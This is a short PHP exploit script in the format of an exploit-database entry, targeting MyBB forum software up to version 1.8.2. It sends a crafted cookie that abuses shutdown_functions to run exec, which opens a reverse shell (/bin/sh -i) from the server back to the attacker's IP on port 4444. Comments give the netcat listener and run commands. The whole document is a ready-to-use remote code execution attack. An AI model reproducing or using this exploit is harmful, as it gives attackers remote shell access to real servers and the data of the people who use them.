<?php
// Exploit Title: MyBB <= 1.8.2 Reverse Shell Exploit
// Date: 15/12/2015
// Exploit Author: ssbostan
// Vendor Homepage: http://www.mybb.com/
// Software Link: http://resources.mybb.com/downloads/mybb_1802.zip
// Version: <= 1.8.2
// Tested on: MyBB 1.8.2
$target="http://localhost/mybb1802/index.php";
$yourip="ipaddress";
$ch=curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt($ch, CURLOPT_COOKIE, "GLOBALS=1; shutdown_functions[0][function]=exec; shutdown_functions[0][arguments][]=php%20%2Dr%20%27%24sock%3Dfsockopen%28%22$yourip%22%2C%204444%29%3Bexec%28%22%2Fbin%2Fsh%20%2Di%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27;");
curl_setopt($ch, CURLOPT_URL, $target);
curl_exec($ch);
curl_close($ch);
// nc -l 4444
// php mybb-1802-core-exploit.php
?>